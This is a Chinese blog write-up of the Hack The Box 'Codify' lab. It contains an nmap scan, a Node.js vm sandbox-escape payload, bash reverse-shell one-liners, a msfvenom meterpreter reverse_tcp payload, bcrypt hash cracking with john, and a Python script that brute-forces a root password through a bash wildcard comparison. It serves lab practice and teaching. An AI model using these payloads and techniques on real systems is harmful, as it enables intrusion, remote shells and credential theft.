首页 > 其他分享 >HTB Codify

HTB Codify

时间:2023-11-17 21:55:39浏览次数:30  
标签:bin HTB kali Codify tcp usr filtered bash

 第一步,和上次一样,改hosts文件,域名对应ip。

信息收集

nmap扫一下:

└─$ nmap -sV 10.10.11.239
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-17 15:58 HKT
Nmap scan report for codify.htb (10.10.11.239)
Host is up (0.31s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http           Apache httpd 2.4.52
100/tcp   filtered newacct
119/tcp   filtered nntp
1021/tcp  filtered exp1
1045/tcp  filtered fpitp
1455/tcp  filtered esl-lm
2522/tcp  filtered windb
2967/tcp  filtered symantec-av
3000/tcp  open     http           Node.js Express framework
3030/tcp  filtered arepa-cas
5631/tcp  filtered pcanywheredata
5904/tcp  filtered ag-swim
9944/tcp  filtered unknown
14000/tcp filtered scotty-ft
15000/tcp filtered hydap
56738/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.80 seconds

可以看到80和3000端口都开了,都访问一下结果发现打开的页面都是一样的,网页提供了在线node.js代码沙箱运行服务。

漏洞利用 

node.js说实话确实不熟,所以去搜了一下node.js相关的漏洞,看到有一个今年的沙箱逃逸漏洞。(https://blog.csdn.net/CQ17743254852/article/details/132049918; https://www.uptycs.com/blog/exploitable-vm2-vulnerabilities)

直接把代码贴上去,发现可以直接获取shell。

const vm = require('vm');
const script = `
const process = this.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('whoami').toString()
`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)

那么下一步的思路是弹shell,方便操作,但是试了很多次,命令都会执行错误,最后是通过执行shell.sh文件,内容为

/bin/bash -i >& /dev/tcp/x.x.x.x/xxxx 0>&1

执行命令 bash -i shell.sh,或者使用bash -c

bash -c "bash -i 0>&1 /dev/tcp/x.x.x.x/xxxx 0>&1"

这里我的解决方法是通过msfvenom生成恶意脚本,执行命令让靶机下载后运行,本地利用 exploits/multi/handler进行监听。其他平台的脚本生成可以参考(https://blog.csdn.net/m0_64444909/article/details/126841128)

──(kali㉿kali)-[~]
└─$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=1234 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes

┌──(kali㉿kali)-[~]
└─$ cat shell.elf
ELF>x@@@8@@�|1�j X��H��M1�j"AZjZH��xQj
AYPj)X�j_j^H��x;H�H��

QH��jZj*XYH��y%I��t▒Wj#XjjH��H1�YY_H��y�j<Xj_^j~ZH��x���

 敏感文件获取用户密码

在/var/www/contact目录下发现一个db数据库文件,

 用sqlite打开一下,看到密码,尝试用john破解一下,这里也可以用hashcat

┌──(kali㉿kali)-[~]
└─$ sqlite3 tickets.db
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .databases
main: /home/kali/tickets.db r/o
sqlite> .tables
tickets  users  
sqlite> select * from users;
3|joshua|$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
sqlite> .quit
                                                                                                            
┌──(kali㉿kali)-[~]
└─$ echo '$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2' > 1.txt
                                                                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt                     
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxxxxxxxxxx       (?)     
1g 0:00:00:39 DONE (2023-11-17 21:20) 0.02523g/s 34.51p/s 34.51c/s 34.51C/s crazy1..angel123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得到joshua的密码,尝试ssh连接,得到user.txt

提权 

下一步尝试进行提权,运行一下sudo命令,发现有一个文件可以运行

 文件内容如下:

#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'

这里就涉及到bash文件的安全规范问题了(https://github.com/anordal/shellharden/blob/master/how_to_do_things_safely_in_bash.md),bash是允许通配符‘ * ’的存在的,这里的弱比较‘  == ’可以由此绕过

(这里的安全问题很大,弱比较不说,还是直接比较密码,比较哈希值我都能好理解一点)

1*==1abc34sd    //true
asd*==  asdfaskdfl   //true

那么我们可以很容易的写一个python脚本来爆破出这个密码

import subprocess
import string
def run_command(command):
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.decode()
    return output

dic=string.ascii_letters+string.digits
password=""
for i in range(100):
    for i in dic:
        output= run_command(f'echo "{password}{i}*" | sudo /opt/scripts/mysql-backup.sh')
        if "Password confirmed" in output:
            password+=i
            print(password)
            break

得到密码后root.txt就在/root下。

 

标签:bin,HTB,kali,Codify,tcp,usr,filtered,bash
From: https://www.cnblogs.com/kw13t/p/17839752.html

相关文章

  • htb-Web Requests
    HTTP1)Togettheflag,starttheaboveexercise,thenusecURLtodownloadthefilereturnedby'/download.php'intheservershownabove.curlIP/download.phpHTTPRequestsandResponses1)WhatistheHTTPmethodusedwhileinterceptingthe......
  • htb-cozyhosting
    HTB-CozyHostinghttps://app.hackthebox.com/machines/CozyHosting──(kwkl㉿kwkl)-[~]└─$tail-l/etc/hosts1......
  • HTB-vaccine靶场练习
    靶机地址:10.129.198.90端口扫描nmap-sC-A10.129.198.90扫描后,得到端口21,22,80,操作系统为Ubuntu,21端口为ftp协议可以进行匿名登录,且存在文件backup.zip,和一些路由信息使用匿名用户登录ftp,帐号anonymous,密码为空dir查看当前目录下的文件使用get下载文件使用unzip......
  • HTB-oopsie靶场练习
    靶机地址:10.129.130.57攻击机地址:10.10.14.185端口扫描nmap-sV-sC10.129.130.57访问10.129.130.57,对一些可能有用的信息进行记录打开burp,刷新网页,点击HTTPhistory,注意到/cdn-cgi/login/script.js试着访问http://10.129.130.57/cdn-cgi/login/script.js......
  • HTB 靶场笔记 ACCESS wakeUP
    AccessSYNOPSISAccessisan"easy"difficultymachine,thathighlightshowmachinesassociatedwiththephysicalsecurityofanenvironmentmaynotthemselvesbesecure.AlsohighlightedishowaccessibleFTP/filesharesoftenleadtogetting......
  • HTB靶场之OnlyForYou
    准备:攻击机:虚拟机kali。靶机:OnlyForYou,htb网站:https://www.hackthebox.com/,靶机地址:https://app.hackthebox.com/machines/OnlyForYou。知识点:DNS解析、代码审计、文件包含、shell反弹、frp端口转发、Neo4j注入漏洞、ngnix知识了解、md5解密、pip3download提权。简单的记录......
  • HTB靶场之Sandworm
    准备:攻击机:虚拟机kali。靶机:Sandworm,htb网站:https://www.hackthebox.com/,靶机地址:https://app.hackthebox.com/machines/Sandworm。知识点:SSTI注入、firejail提权、DNS解析、PGP解密、敏感信息发现、shell反弹。一:信息收集1.nmap扫描使用nmap对10000内的端口进行扫描,命令:sud......
  • wordpress插件:用meow Lightbox对图片放大浏览(wordpress 6.2)
    一,安装插件在插件中搜索meow,选择MeowLightbox,点立即安装安装完成后点启用按钮二,测试效果说明:刘宏缔的架构森林—专注it技术的博客,网站:https://blog.imgtouch.com原文: https://blog.imgtouch.com/index.php/2023/06/20/wordpress-cha-jian-yong-meow-lightbox-d......
  • HTB ACADEMY-Hacking WordPress WRITE UP
    YouhavebeencontractedtoperformanexternalpenetrationtestagainstthecompanyINLANEFREIGHTthatishostingoneoftheirmainpublic-facingwebsitesonWordPress.Enumeratethetargetthoroughlyusingtheskillslearnedinthismoduletofindavar......
  • HTB ACADEMY-Linux Privilege Escalation WRITE UP
    WehavebeencontractedtoperformasecurityhardeningassessmentagainstoneoftheINLANEFREIGHTorganizations'public-facingwebservers.Theclienthasprovideduswithalowprivilegedusertoassessthesecurityoftheserver.ConnectviaSSH......